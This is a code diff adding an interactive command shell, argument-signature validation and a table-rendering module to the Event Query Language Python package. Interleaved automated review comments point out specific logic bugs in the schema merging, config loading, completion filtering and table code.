
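Review bot: In Schema._merge_subschema the list branch computes `nested_a = [s for s in b if not is_string(s)]`, iterating `b` instead of `a`, so the nested entries of the first schema are never merged and `nested_a` duplicates `nested_b`; it should read `nested_a = [s for s in a if not is_string(s)]`. In `_get_item_schema` the list branch calls `cls._merge_subschema(nested_schema, s)` and discards the result, so only the first nested element's schema survives; assign it back with `nested_schema = cls._merge_subschema(nested_schema, s)`. `Schema.flatten` folds every event type with `flattened.update(event_schema)`, so a field name shared by two event types with different types silently takes the last one in sorted order; `_merge_subschema` would produce `mixed` there if that is the intended semantics, and either way a comment on the loop should say which wins. `learn` is fed raw event dictionaries and `_get_item_schema` keeps only keys matching `IDENT_RE`, which is worth stating in its docstring since fields are dropped rather than rejected.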
--- /dev/null
+++ b/eql/shell.py
@@ -0,0 +1,748 @@ +#!/usr/bin/env python +# -*- coding: utf-8 -*- +"""Wrapper around the Cmd library for EQL.""" +from __future__ import print_function + +import cmd +import csv +import importlib +import os +import json +import re +import sys +from collections import defaultdict + +from .ast import NamedSubquery +from .engine import PythonEngine +from .errors import EqlSyntaxError, EqlParseError +from .functions import list_functions +from .parser import parse_query, _get_parser, allow_enum_fields +from .pipes import list_pipes, CountPipe +from .schema import Schema, EVENT_TYPE_ANY, EVENT_TYPE_GENERIC +from .table import Table +from .types import Array, Nested, is_union +from .utils import stream_file_events, load_dump, to_unicode, is_array + +try: + import prompt_toolkit + from prompt_toolkit.formatted_text import PygmentsTokens + from prompt_toolkit.lexers import PygmentsLexer + from prompt_toolkit.document import Document + from prompt_toolkit.completion import WordCompleter, PathCompleter, Completer, Completion + from prompt_toolkit.history import FileHistory + from prompt_toolkit import PromptSession +except ImportError: + prompt_toolkit = None + Completer = object + PygmentsTokens = None + +try: + from prompt_toolkit import print_formatted_text +except ImportError: + print_formatted_text = print + +try: + from .highlighters import EqlLexer +except ImportError: + EqlLexer = None + + +try: + import pygments + from pygments.styles import get_style_by_name, get_all_styles + from prompt_toolkit.styles import style_from_pygments_cls +except ImportError: + pygments = None + get_style_by_name = None + get_all_styles = None + style_from_pygments_cls = None + +# Determine the installed version of readline +readline = None +readline_type = None + +LIBEDIT = "libedit" +PYREADLINE = "pyreadline" +GNUREADLINE = "gnureadline" + +# Determine the input function that should be used for the prompt +input_func = getattr(__builtins__, "raw_input", input) + +# Determine which 
version of readline is installed +for module in ["readline", "gnureadline"]: + try: + readline = importlib.import_module(module) + readline_doc = (getattr(readline, "__doc__", None) or "").lower() + if PYREADLINE in sys.modules: + readline_type = PYREADLINE + elif LIBEDIT in readline_doc: + readline_type = LIBEDIT + elif "gnu" in readline_doc.lower() or module == GNUREADLINE: + readline_type = GNUREADLINE + + break + + except Exception: + continue + +# if we found a readline, but had an error loading _the_ readline, so we'll replace it +if readline is not None and readline not in sys.modules: + sys.modules['readline'] = readline + + +def callmethod(obj, method, default=None, *args, **kwargs): + """Call a method but get a default value if it doesn't exist.""" + method = getattr(obj, method, None) + if callable(method): + return method(*args, **kwargs) + return default + + +class ShellCompleter(Completer): + """Completer for shell commands and EQL syntax.""" + + def __init__(self, shell): # type: (EqlShell) -> None + """Completer for EQL shell.""" + self.shell = shell + self.command_completer = WordCompleter(lambda: shell.completenames(""), match_middle=True) + self.path_completer = PathCompleter(expanduser=True) + + def get_completions(self, document, complete_event): + """Get possible completions depending on context.""" + completer = None + complete_remaining = False + complete_eql = False + first_word = None + + if not self.shell.multiline: + self.shell.prompt_session.lexer = None + first_word = document.text and document.text.split()[0] + if ' ' not in document.text: + completer = self.command_completer + elif first_word == "search": + complete_eql = True + self.shell.prompt_session.lexer = self.shell.tk_lexer + elif first_word in ("input", "config", "output"): + completer = self.path_completer + complete_remaining = True + else: + self.shell.prompt_session.lexer = self.shell.tk_lexer + complete_eql = True + + if complete_eql: + word = 
document.get_word_before_cursor() + for match in self.shell.complete_search(word, document.text, document.cursor_position, + len(document.text), contains=True): + yield Completion(match, -len(word)) + return + + if completer: + if complete_remaining: + offset = len(first_word) + 1 + path_doc = Document(document.text[offset:]) + for completion in self.path_completer.get_completions(path_doc, complete_event): + yield Completion(completion.text, 0, display=completion.display) + else: + for completion in completer.get_completions(document, complete_event): + yield completion + elif first_word: + word = document.get_word_before_cursor() + method = getattr(self.shell, "complete_" + first_word, None) + if method: + for match in method(word, document.text_before_cursor, document.cursor_position, len(document.text)): + yield Completion(match, -len(word)) + + +class EqlShell(cmd.Cmd, object): + """Event Query Language interactive console application.""" + + # Allow dashes + identchars = cmd.Cmd.identchars + '-' + default_prompt = "eql> " + continue_prompt = " ..> " + history_file = os.path.join(os.path.expanduser("~"), '.eql') + ansi_invisible_re = re.compile(r"(\x1b.*?[a-z])") + nested_field_re = re.compile(r"\b([a-zA-Z][a-zA-Z0-9_]*)((\[(\d+)\]|\.([a-zA-Z][a-zA-Z0-9_]*))+|\.|\[\d*)$") + + field_split = re.compile(r"[.\[\]]+") + doc_header = "Available commands (type help ):" + + __eql_keywords = set() + + def __init__(self, *args, **kwargs): + """EQL Shell.""" + super(EqlShell, self).__init__(*args, **kwargs) + self.tty = callmethod(self.stdout, "isatty", False) + self.multiline = False + self.stop = False + self.last_results = [] + self.columns = [] + self.input_file = None + self.empty_count = 0 + self.prompt_session = False + self.config = None + self.last_display_fn = None + self.display_fn = None + self.last_query = None + + if prompt_toolkit and self.tty: + self.tk_lexer = None + if EqlLexer: + self.tk_lexer = PygmentsLexer(EqlLexer) + + self.tk_completer = 
ShellCompleter(self) + self.tk_history = FileHistory(self.history_file + ".tk") + style_cls = None + + # switch to something more friendly + if get_style_by_name: + style = get_style_by_name("rrt" if sys.platform.startswith("win") else "monokai") + if style: + style_cls = style_from_pygments_cls(style) + + self.default_style = style_cls + self.prompt_session = PromptSession(style=style_cls, history=self.tk_history, + completer=self.tk_completer) + + @classmethod + def get_keywords(cls, force=False): + """Get the EQL keywords.""" + if force or not cls.__eql_keywords: + wordlist = set() + parser = _get_parser() + keywords = set(parser.keywords) + + keywords.remove("in") + keywords.add("in (") + + wordlist.update(["true", "false", "null"]) + + keywords.remove("with") + wordlist.update(["with maxspan=", "fork=true"]) + + wordlist.update("{}(".format(f) for f in list_functions()) + wordlist.update("| {}".format(p) for p in list_pipes()) + keywords.remove("of") + wordlist.update(["{} of [".format(k) for k in NamedSubquery.supported_types]) + + wordlist.update(keywords) + cls.__eql_keywords = list(sorted(wordlist)) + return cls.__eql_keywords + + def prompt_func(self, text=None): + """Colorize the prompt if possible.""" + if text is None: + text = self.prompt + + # Only use prompt_toolkit when running on multiple lines + if self.prompt_session: + return self.prompt_session.prompt(text) + return input_func(text) + + @property + def prompt(self): + """Dynamically determine the prompt based off the current state.""" + return self.continue_prompt if self.multiline else self.default_prompt + + def emptyline(self): + """Don't automatically run that last command on duplicate ENTER.""" + return "" + + def cmdloop(self, intro=None): + """Patch the original cmd.Cmd for better support.""" + self.preloop() + old_completer = None + if readline: + old_completer = readline.get_completer() + readline.set_completer(self.complete) + to_parse = self.completekey + ": complete" + if 
readline_type == LIBEDIT: + to_parse = 'bind ^I rl_complete' + readline.parse_and_bind(to_parse) + + try: + if intro is not None: + self.intro = intro + if self.intro: + print_formatted_text(intro) + + print_formatted_text("type help to view more commands") + + self.stop = False + + while not self.stop: + try: + line = self.prompt_func(self.prompt) + if isinstance(line, bytes): + line = line.decode("utf-8") + line = line.rstrip("\r\n") + except EOFError: + print_formatted_text("") + self.stop = True + line = "" + except KeyboardInterrupt: + print_formatted_text() + print_formatted_text("KeyboardInterrupt") + self.multiline = False + continue + + line = self.precmd(line) + self.stop = self.onecmd(line) or self.stop + self.stop = self.postcmd(self.stop, line) + self.postloop() + finally: + if readline and old_completer: + callmethod(readline, "set_completer", None, old_completer) + + def parseline(self, line): + """Continue parsing multiple lines when enabled.""" + if self.multiline: + line = self.lastcmd + "\n" + line + cmd, arg, line = super(EqlShell, self).parseline(line) + + if self.multiline and line == self.lastcmd: + self.empty_count += 1 + else: + self.empty_count = 0 + return cmd, arg, line + + def onecmd(self, line): + """Wrap exception handling.""" + try: + return super(EqlShell, self).onecmd(line) + except EqlParseError as err: + self.multiline = False + + if pygments and EqlLexer and self.prompt_session: + # Recover the original text + err_text = to_unicode(err) + lines = err_text.splitlines() + print_formatted_text("\n".join(lines[:2])) + tokens = list(pygments.lex("\n".join(lines[2:]), lexer=EqlLexer())) + print_formatted_text(PygmentsTokens(tokens), style=self.prompt_session.style) + else: + print_formatted_text(err) + except Exception as err: + self.multiline = False + print_formatted_text(u"{}: {}".format(type(err).__name__, err)) + + def complete_single_file(self, text, line, begidx, endidx): + """Tab completion for file paths.""" + startpos = 0 + 
+ while startpos < len(line) and line[startpos] in self.identchars: + startpos += 1 + + startpos += len(line[startpos:]) - len(line[startpos:].lstrip()) + file_path = "".join(line[startpos:]) + + matches = self.complete_files(file_path) + completions = [m[begidx - startpos:] for m in matches] + return completions + + def default(self, line): + """Return the line.""" + print_formatted_text("Unknown command: " + line) + + def complete_files(self, text): + """Get tab-completion options for file paths.""" + matches = [] + directory, match = os.path.split(text) + expanded_dir = os.path.expanduser(directory or ".") + if not os.path.exists(expanded_dir): + return [] + + for name in os.listdir(os.path.expanduser(directory or ".")): + if name.startswith(match): + matches.append(os.path.join(directory, name)) + return matches[:40] + + def do_input(self, file_path): + """Point EQL to a data file for searches to be executed against.""" + # Confirm that it loads and that events are found + if not file_path: + print_formatted_text("Error: File path not specified") + return + + file_path = os.path.expanduser(file_path) + size = [0] + + def increment(event): + size[0] += 1 + return event + + event_stream = stream_file_events(file_path) + schema = Schema.learn(increment(event) for event in event_stream) + print_formatted_text("Using file {:s} with {:d} events".format(file_path, size[0])) + Schema.default(schema) + self.input_file = file_path + + def do_schema(self, line): + """Show the current EQL schema used to validate queries against the input file.""" + import pprint + pprint.pprint(Schema.current().schema) + + def do_config(self, file_path): + """Load a config file for schema checking or other engine parameters.""" + if not file_path: + print_formatted_text("Error: File path not specified") + return + + config = load_dump(file_path) + if not isinstance(config, dict): + print_formatted_text("Invalid config data") + + self.config = config + if config.get("schema") is not None: + 
schema = Schema(**self.config["schema"]) + schema.default(schema) + + # Only enable this command if prompt toolkit is found + if prompt_toolkit and get_all_styles: + def do_style(self, line): + """Change the color theme used for syntax highlighting.""" + styles = set(get_all_styles()) + if "reset" in line.split(): + self.prompt_session.style = self.default_style + return + elif line in styles: + pygments_style_cls = get_style_by_name(line) + self.prompt_session.style = style_from_pygments_cls(pygments_style_cls) + return + elif line: + print_formatted_text("Invalid style\n") + + # Print the list of available styles + self.print_topics("Available styles", list(sorted(styles)), 15, 80) + + def complete_style(self, text, line, begidx, endidx): + """"Complete pygment styles.""" + styles = list(get_all_styles()) + styles.append("reset") + styles = [s for s in styles if text in s] + # sort the exact matches to the top + styles.sort(key=lambda s: (not s.startswith(text), s)) + return styles + + complete_input = complete_single_file + complete_config = complete_single_file + complete_output = complete_single_file + + def do_clear(self, *args): + """Clear the terminal.""" + if sys.platform.startswith('win'): + os.system('cls') + else: + sys.stdout.write('\033[2J\033[1;1H') + + def help_search(self, *args): + """Print help text.""" + print_formatted_text(to_unicode(EqlShell.do_search.__doc__)) + print_formatted_text("\nQueries spanning multiple lines can be terminated with two newlines or a semicolon.") + + def do_search(self, search_text): + """Run an EQL search over the input data.""" + search_lines = search_text.splitlines(keepends=False) + self.multiline = False + + # if only "search" is typed in, then keep prompting + if not search_text: + self.multiline = True + return + + try: + with allow_enum_fields: + parsed_query = parse_query(search_text, implied_base=True, implied_any=True, cli=True) + except EqlSyntaxError as exc: + # check if the query should be continued on 
another line + if (exc.line + 1) == len(search_lines) and (exc.column + 1) == len(search_lines[-1]): + if not search_text.endswith(";"): + self.multiline = True + return + raise + + # check if the query is fully valid, but spans multiple lines + # we want to keep prompting until we see a semicolon, or two blank lines + if len(self.lastcmd.splitlines(keepends=True)) > 1: + if not search_text.endswith(";") and self.empty_count < 2: + self.multiline = True + return + + if not self.input_file: + print_formatted_text("Input file required. Run `input `") + return + + engine = PythonEngine(self.config) + self.last_results = [] + count = [0] + + def callback(results): + count[0] += 1 + for e in results.events: + self.last_results.append(e.data) + if self.display_fn is None: + if count[0] < 100: + engine.print_event(e) + elif count[0] == 100: + print_formatted_text("...") + count[0] += 1 + + engine.config["flatten"] = False + engine.add_query(parsed_query) + engine.add_output_hook(callback) + event_stream = stream_file_events(self.input_file) + engine.stream_events(event_stream) + + self.last_query = parsed_query + + count = len(self.last_results) + + if self.display_fn and count: + self.display_fn(self.last_results) + + # Unconditionally show the number of results returned + print_formatted_text("{:d} result{} found".format(count, "" if count == 1 else "s")) + + def complete_search(self, text, line, begidx, endidx, fields_only=False, contains=False): # noqa: C901 + """Complete EQL keywords or known schema fields.""" + matches = set() + nested_match = self.nested_field_re.search(line) + + schema = Schema.current() # type: Schema + + # check for completion of nested fields + if nested_match: + parts = self.field_split.split(nested_match.group(0)) + path = [int(f) if f.isdigit() else f for f in parts] + + # for now, just drop events[0] for completing the schema + if len(path) > 2 and path[0] == "events" and isinstance(path[1], int): + path = path[2:] + + # determine what 
could be completed + if len(path) > 1: + type_hint = schema.get_event_type_hint(EVENT_TYPE_ANY, path[:-1]) + else: + # we don't know what the event type is so it could technically be any of the top level fields + type_hints = defaultdict(list) + + for event_type, event_schema in schema.schema.items(): + for k in event_schema: + type_hints[k].append(schema.get_event_type_hint(event_type, [k])) + + # union them all together + type_hint = Nested([(k, tuple(v)) for k, v in type_hints.items()]) + + prefix = text if text.endswith(".") else "" + if isinstance(type_hint, Nested): + for key, v in type_hint: + if key == path[-1]: + if isinstance(v, Nested): + matches.add(prefix + key + ".") + elif isinstance(v, Array): + matches.add(prefix + key + "[") + else: + matches.add(prefix + key) + + elif is_union(type_hint): + for option in type_hint: + if isinstance(option, Nested): + for key, v in option: + if key == path[-1]: + if isinstance(v, Nested): + matches.add(prefix + key + ".") + elif isinstance(v, Array): + matches.add(prefix + key + "[") + else: + matches.add(prefix + key) + + else: + if not fields_only: + matches.update(self.get_keywords()) + + # if you're in a pipe, allow completion for only pipes + completed = line if not text else line[:-len(text)] + if completed.rstrip().endswith("|"): + return list(sorted(pipe for pipe in list_pipes() if pipe.startswith(text))) + + # require keywords to have exact (not substring) matches + matches = {m for m in matches if m.startswith(m)} + + if schema.allow_any: + matches.add(EVENT_TYPE_ANY) + + if schema.allow_generic: + matches.add(EVENT_TYPE_GENERIC) + + matches.update(schema.schema) + + for event_schema in schema.schema.values(): + for k, v in event_schema.items(): + if isinstance(v, dict): + matches.add(k + ".") + else: + matches.add(k) + + if text: + if contains: + matches = [w for w in set(matches) if text in w] + # show the matches that start with this first + matches.sort(key=lambda m: (not m.startswith(text), m)) + 
return matches + return list(sorted(w for w in matches if w.startswith(text))) + return [] + + def _save_csv(self, path, results): + with open(path, "w") as output_file: + if not results: + return + + all_fields = set() + array_fields = defaultdict(int) + + for result in results: + for k, v in result.items(): + all_fields.add(k) + if is_array(v): + array_fields[k] = max(array_fields[k], len(v)) + + # now build up the columns + array_fields = {k: v for k, v in array_fields.items() if v < 3} + all_fields = list(sorted(all_fields)) + + # Start building the csv + csv_file = csv.writer(output_file, quoting=csv.QUOTE_MINIMAL) + header = [] + for k in all_fields: + if k in array_fields: + header.extend(["{}[{}]".format(k, i) for i in range(array_fields[k])]) + else: + header.append(k) + + # check for python 2 compatibility + if type(u"") != str: + def writerow(row): + csv_file.writerow([cell.encode("utf8") for cell in row]) + else: + writerow = csv_file.writerow + + writerow(header) + + for result in results: + row = [] + + for k in all_fields: + value = result.get(k, "") + if k in array_fields: + for i in range(array_fields[k]): + if is_array(value) and i < len(value): + row.append(value[i]) + else: + row.append("") + else: + row.append(value) + + writerow([to_unicode(r) if r is not None else "" for r in row]) + + def complete_display(self, text, line, *args): + """Complete on or off values.""" + options = ("off", "on") + + if not text: + return options + else: + return [o for o in options if text.startswith(o)] + + def do_display(self, line): + """Toggle the displaying of results.""" + if line == "off": + if self.display_fn: + self.last_display_fn = self.display_fn or self.last_display_fn + self.display_fn = False + elif line == "on": + if not self.display_fn: + self.display_fn = self.last_display_fn + self.last_display_fn = False + self.display_fn = self.display_fn or None + else: + print("Expected on/off to display.", file=sys.stderr) + + def do_output(self, path): + 
"""Save the most recent results as a .json, .jsonl, or .csv file.""" + _, extension = os.path.splitext(path) + extension = extension.lower() + + if extension == ".csv": + self._save_csv(path, self.last_results) + elif extension == ".jsonl": + with open(path, "w") as f: + for result in self.last_results: + f.write(json.dumps(result)) + f.write("\n") + elif extension == ".json": + with open(path, "w") as f: + json.dump(self.last_results, f, indent=2, sort_keys=True) + else: + print("Unknown file type: {:s}".format(extension), file=sys.stderr) + return + + print("Saved {:d} results to {:s}".format(len(self.last_results or []), path)) + + def do_shell(self, line): + """Run a shell command.""" + os.system(line) + + def do_table(self, line): + """Render the most recent results as a table and arguments will update the columns.""" + if not line and not self.last_results: + print_formatted_text("No results to render, and no columns specified.") + print_formatted_text("Try performing a `search` command") + return + + if "--clear" in line: + self.display_fn = None + return + + if line or not self.display_fn: + columns = [c.strip() for c in re.split(r"[,\s]+", line) if c.strip()] + count_keys = {"count", "key", "percent"} + + def display_table(results): + dynamic_columns = list(columns) + show_counts = set(count_keys).intersection(set(columns)) + show_counts = show_counts or any(c.startswith("key[") or c.startswith("key.") for c in dynamic_columns) + + if any(isinstance(pipe, CountPipe) for pipe in self.last_query.pipes) and not show_counts: + last_count = next(pipe for pipe in reversed(self.last_query.pipes) if isinstance(pipe, CountPipe)) + # Figure out how many keys there are + dynamic_columns = {"count": None} + + if last_count.arguments: + dynamic_columns["key"] = True + + if len(self.last_results) > 1: + for key in ("percent", "total_hosts"): + if key in self.last_results[0]: + dynamic_columns[key] = None + + table = Table.from_list(dynamic_columns, results) + for i, row 
 in enumerate(table.lines()):
+ # , bold=(0 < i <= len(table._headers)))
+ print_formatted_text(row)
+
+ self.display_fn = display_table
+
+ if self.last_results and self.display_fn:
+ self.display_fn(self.last_results)
+
+ def complete_table(self, *args):
+ """Tab completion for tables."""
+ return self.complete_search(*args, fields_only=True, contains=True)
+
+ def do_quit(self, line):
+ """Exit the shell."""
+ return True
+
+ def do_exit(self, line):
+ """Exit the shell."""
+ return True
diff --git a/eql/signatures.py b/eql/signatures.py
new file mode 100644
index 0000000..cef2e4b
--- /dev/null
+++ b/eql/signatures.py
@@ -0,0 +1,37 @@
+"""Mixin for adding signature validation."""
+from eql.types import EXPRESSION, check_full_hint
+
+
+class SignatureMixin(object):
+ """Type validation for arguments."""
+
+ minimum_args = None
+ # maximum_args = None
+ argument_types = []
+ additional_types = None
+
+ @classmethod
+ def validate(cls, arguments, type_hints=None):
+ """Find the first invalid argument. Return None if all are valid."""
+ minimum_args = cls.minimum_args if cls.minimum_args is not None else len(cls.argument_types)
+
+ if minimum_args is not None and len(arguments) < minimum_args:
+ return len(arguments), arguments, type_hints
+
+ # if self.additional_types is not None and self.maximum_args is not None:
+ # if len(self.arguments) > self.maximum_args:
+ # return self.arguments[self.maximum_args or len(self.argument_types)]
+
+ if type_hints is None:
+ type_hints = [EXPRESSION] * len(arguments)
+
+ for i, node_hint in enumerate(type_hints):
+ if i >= len(cls.argument_types):
+ status = check_full_hint(cls.additional_types, node_hint)
+ else:
+ status = check_full_hint(cls.argument_types[i], node_hint)
+
+ if not status:
+ return i, arguments, type_hints
+
+ return None, arguments, type_hints
diff --git a/eql/table.py b/eql/table.py
new file mode 100644
index 0000000..c5c501c
--- /dev/null
+++ b/eql/table.py
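Review bot: `do_config` prints "Invalid config data" when `load_dump` returns something other than a dict but then falls through, so `self.config` is set to that value and the following `config.get("schema")` raises; `onecmd` reports the exception, but the invalid config stays in place and is later handed to `PythonEngine(self.config)` by `do_search`. A `return` after the message fixes this, and expanding the path the way `do_input` does (`file_path = os.path.expanduser(file_path)`) keeps the two commands consistent. In `complete_search`, the filter `matches = {m for m in matches if m.startswith(m)}` is a tautology, so the "require keywords to have exact (not substring) matches" comment is not enforced; either drop the line or compare against `text`, bearing in mind that the later `contains` branch relies on substring matches. `schema.default(schema)` in `do_config` is the same call that `do_input` writes as `Schema.default(schema)`, only routed through an instance; using the class form in both places reads more clearly.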
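Review bot: The `validate` docstring says it returns None when all arguments are valid, but every path returns a 3-tuple `(index_or_None, arguments, type_hints)`, so a caller that tests the result for truthiness will treat a valid signature as a failure. Reword it to `"""Find the first invalid argument. Return (None, arguments, type_hints) if all are valid."""`. The guard `minimum_args is not None` on the following line is always true, because the fallback is `len(cls.argument_types)`. With the maximum-args check commented out, surplus arguments are checked against `cls.additional_types`, which defaults to None; whether `check_full_hint(None, hint)` accepts or rejects them is not visible here and deserves a comment on `additional_types = None`.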
@@ -0,0 +1,286 @@ +"""Helper functionality for displaying pretty tables.""" +from collections import OrderedDict +import json +import textwrap +import re + +try: + from itertools import izip_longest +except ImportError: + from itertools import zip_longest as izip_longest + + +from .utils import to_unicode, is_number +join_lines = "\n".join + + +def get_schema(*dot_fields): + """Convert a list of dot_fields into a nested schema.""" + schema = OrderedDict() + for field in dot_fields: + sub_schema = schema + parts = [int(p) if p.isdigit() else p for p in re.split(r"[.\[\]]+", field) if p != ""] + for piece in parts[:-1]: + # It could be set explicitly to None, causing get(piece, {}) to return None + sub_schema[piece] = sub_schema.get(piece) or OrderedDict() + sub_schema = sub_schema[piece] + + # Now set this one to an empty dictionary + sub_schema[parts[-1]] = None + return schema + + +def headerspan(nested): + """For a nested schema object, created the ordered headers, and float empty cells to the bottom.""" + headers = [[]] + nested = nested + + for k in nested: + if nested and nested.get(k): + nested_headers = headerspan(nested[k]) + + # Figure out how long it was by counting the leaf nodes + span = len(nested_headers[-1]) + + # add a merged column to the top of the nested headers + nested_headers.insert(0, [(span, to_unicode(k))]) + + # the prefix will be appended on top new rows that will be added + prefix = [(s, '') for (s, _) in headers[0]] + + # walk from bottom to top, anchoring them to the bottom and moving up each time + for pos, nested_header in enumerate(reversed(nested_headers), 1): + # loop over each header in reverse order + if pos > len(headers): + headers.insert(0, prefix[:]) + headers[-pos].extend(nested_header) + else: + span = 1 + # put the key on the bottom + headers[-1].append((span, to_unicode(k))) + + # every row needs to grow at the top, depending on what's below it + for next_i, header in enumerate(headers[:-1], 1): + header.append((span, 
'')) + + return headers + + +def format_cell(cell, delim=", ", **kwargs): + """Convert a cell to the rendered contents.""" + if isinstance(cell, (list, tuple)): + return delim.join("{}".format(c) for c in cell) + elif isinstance(cell, (dict, bool)): + return json.dumps(cell) + elif cell is None: + return "" + elif is_number(cell): + return cell + else: + return to_unicode(cell) + + +def to_row(item, schema, **kwargs): + """Convert an item to a row for a table.""" + row = [] + for k, subschema in schema.items(): + if isinstance(item, dict): + cell = item.get(k) + elif isinstance(item, list) and isinstance(k, int) and 0 <= k < len(item): + cell = item[k] + else: + cell = None + + if not subschema: + row.append(format_cell(cell, **kwargs)) + else: + cells = [format_cell(c, **kwargs) for c in to_row(cell, schema[k])] + row.extend(cells) + return row + + +def _wrapped_lines(text, wrap): + """Wrap lines while preserving original line breaks.""" + lines = [] + for line in text.rstrip().splitlines(): + lines.extend(textwrap.wrap(line, wrap)) + return lines + + +class Table(object): + """Endgame pretty table base class.""" + + def __init__(self, body, num_columns=0, names=None, merged_headers=None, top=True, bottom=True, border=True, pad=1, + border_div='=', col_sep='|', wrap=None, row_outline=None, outline=None, row_div='-', align=None): + """Create a parameterized table with rows of cells.""" + # Create new rows based off the newlines + array_body = [] + self._align = [align or '<'] * num_columns + self._row_div = row_div + self._border_div = border_div + self._top = top + self._bottom = bottom + + # Try to guess the alignment by looking at the first row + if len(body) > 1: + first = body[0] + if num_columns == 0: + num_columns = len(first) + self._align = [align or '<'] * num_columns + + for i in range(num_columns): + cell = first[i] + if not align and is_number(cell): + self._align[i] = '>' + if isinstance(cell, float): + # convert all the rows to floats with nice 
decimals + for row in body: + if is_number(row[i]): + row[i] = "{:.3f}".format(row[i]) + + if not wrap: + for row in body: + split_cells = [to_unicode(c).rstrip().splitlines() for c in row] + array_body.append(list(izip_longest(*split_cells, fillvalue=''))) + else: + for row in body: + split_cells = [_wrapped_lines(to_unicode(c), wrap) for c in row] + array_body.append(list(izip_longest(*split_cells, fillvalue=''))) + + self._body = array_body + + # If the outline is set to None/auto, only add the outline if some of the rules span multiple lines + # if row_outline is None and outline is None: + # if any(len(row) > 1 for row in array_body): + # row_outline = True + + self._outline = row_outline or outline + self._padding = pad + self._pad = ' ' * self._padding + self._col_sep = col_sep if outline else ' ' + self._header_sep = self._col_sep.strip().center(len(self._col_sep)) + self._num_columns = num_columns + self._border = border + + if merged_headers: + self._headers = merged_headers + elif names: + self._headers = [[(1, k) for k in names]] + else: + self._headers = [] + + self._widths = None + self._row_width = None + + def calculate_widths(self): + """Calculate the autofit widths for each column.""" + self._widths = [0] * self._num_columns + for i in range(self._num_columns): + try: + self._widths[i] = max(len(line[i]) for row in self._body for line in row) + except ValueError: + pass + + delim_width = len(self._col_sep) + + # Now expand cells to accommodate for nested headers + for header in self._headers: + pos = 0 + for (span, k) in header: + min_width = len(k) + + # update every row that this spans over + num_delims = span - 1 + inner_widths = sum(self._widths[pos:pos + span]) + inner_padding = (self._padding * 2 + delim_width) * num_delims + total_widths = inner_widths + inner_padding + + delta = min_width - total_widths + + if delta > 0: + add_each = int(delta / span) + add_one = delta % span + for i, column in enumerate(range(pos, pos + span)): + 
self._widths[column] += add_each + self._widths[column] += i < add_one + pos += span + + self._row_width = (self._padding * 2 + delim_width) * self._num_columns + sum(self._widths) - delim_width + + def lines(self): + """Get the lines in the table.""" + self.calculate_widths() + delim_width = len(self._col_sep) + + join_row = self._col_sep.join + join_header = self._header_sep.join if len(self._headers) > 1 else join_row + rule_line = self._border_div * self._row_width + row_div = self._row_div * self._row_width + lines = [] + + if self._border and self._top: + lines.append(rule_line) + + for header in self._headers: + pos = 0 + cells = [] + + for (span, k) in header: # type: (int, str) + col_widths = sum(self._widths[pos:pos + span]) + num_delims = span - 1 + inner_padding = num_delims * self._padding * 2 + header_width = col_widths + inner_padding + (delim_width * num_delims) + + text = k.center(header_width) if span > 1 else k.ljust(header_width) + cells.append(self._pad + text + self._pad) + pos += span + lines.append(join_header(cells)) + + if len(self._headers): + lines.append(rule_line) + + # header_format = col_sep.join('{:^' + str(width) + '}' for width in widths) + + # Now generate the format string for each row + formats = [] + for i, (align, width) in enumerate(zip(self._align, self._widths)): + if align == '<' and i == self._num_columns - 1: + # No need to pad the right-most cell with empty space + width = "" + fmt = self._pad + '{:' + align + to_unicode(width) + "}" + self._pad + formats.append(fmt) + row_format = join_row(formats) + format_row = row_format.format + + for i, row in enumerate(self._body): + if i and self._outline: + lines.append(row_div) + lines.extend(format_row(*line) for line in row) + + if self._border and self._bottom: + lines.append(rule_line) + return lines + + @classmethod + def from_list(cls, dot_fields, results, **params): # type: (list[str], list[dict], str) -> Table + """Generate a table from a list of results.""" + schema 
= get_schema(*dot_fields)
+ num_columns = len(to_row({}, schema))
+ body = [to_row(r, schema, **params) for r in results]
+ headers = headerspan(schema)
+ return Table(body, num_columns, merged_headers=headers, **params)
+
+ def __iter__(self):
+ """Iterate over the lines in the table."""
+ return (line + "\n" for line in self.lines())
+
+ def __unicode__(self):
+ """Python 2 and 3 unicode support."""
+ return join_lines(self.lines())
+
+ def __str__(self):
+ """Python 2 and 3 utf8 encoding."""
+ unicoded = self.__unicode__()
+ if not isinstance(unicoded, str):
+ return unicoded.encode("utf-8")
+ return unicoded
diff --git a/eql/tests/__init__.py b/eql/tests/__init__.py
new file mode 100644
index 0000000..077311f
--- /dev/null
+++ b/eql/tests/__init__.py
@@ -0,0 +1,9 @@
+"""Helper tests for EQL."""
+from .base import TestEngine, QUERIES_FILE, EVENTS_FILE
+
+
+__all__ = (
+ "TestEngine",
+ "QUERIES_FILE",
+ "EVENTS_FILE",
+)
diff --git a/tests/base.py b/eql/tests/base.py
similarity index 50%
rename from tests/base.py
rename to eql/tests/base.py
index 079583b..2b19fc6 100644
--- a/tests/base.py
+++ b/eql/tests/base.py
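Review bot: `Table.__init__` mutates the caller's rows in place when the first row contains a float (`row[i] = "{:.3f}".format(row[i])`), so a caller that passes its own `body` gets its numbers replaced by strings. Copy the rows first, `body = [list(row) for row in body]`, before the alignment pass. The alignment guess is also skipped for a single-row table because of `if len(body) > 1:`; the comment says it looks at the first row, so `if body:` seems to be what was meant, and `first[i]` would then need a guard against a first row shorter than `num_columns`. `from_list` forwards the same `**params` to both `to_row` and `Table(...)`, and `Table.__init__` has no `**kwargs`, so a `delim=` argument intended for `format_cell` raises TypeError on the `Table` side.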
@@ -1,64 +1,73 @@ -"""Base functionality for testing.""" +"""Helper class for validating EQL transpilers.""" import json import os import unittest +import toml + from eql.parser import parse_analytic -from eql.engines.base import Event +from eql.events import Event +from eql.etc import get_etc_path +from eql.schema import EMPTY_SCHEMA + DIR = os.path.dirname(os.path.abspath(__file__)) +QUERIES_FILE = get_etc_path("test_queries.toml") +EVENTS_FILE = get_etc_path("test_data.json") class TestEngine(unittest.TestCase): """Base test with helpful methods for getting example data and queries.""" - QUERIES_FILE = os.path.join(DIR, "test_queries.json") - EVENTS_FILE = os.path.join(DIR, "test_data.json") engine_name = 'base' - - _query_cache = {} + query_cache = {} + schema = EMPTY_SCHEMA + queries_file = QUERIES_FILE + events_file = EVENTS_FILE + __events = None @classmethod def get_analytic(cls, query_text): """Get a cached EQL analytic.""" - if query_text not in cls._query_cache: - analytic_info = { - 'metadata': {'id': 'query-{:d}'.format(len(cls._query_cache)), - 'name': query_text, - 'analytic_version': '1.0.0'}, - 'query': query_text - } - cls._query_cache[query_text] = parse_analytic(analytic_info) - return cls._query_cache[query_text] + with cls.schema: + if query_text not in cls.query_cache: + analytic_info = { + 'metadata': {'id': 'query-{:d}'.format(len(cls.query_cache)), 'name': query_text}, + 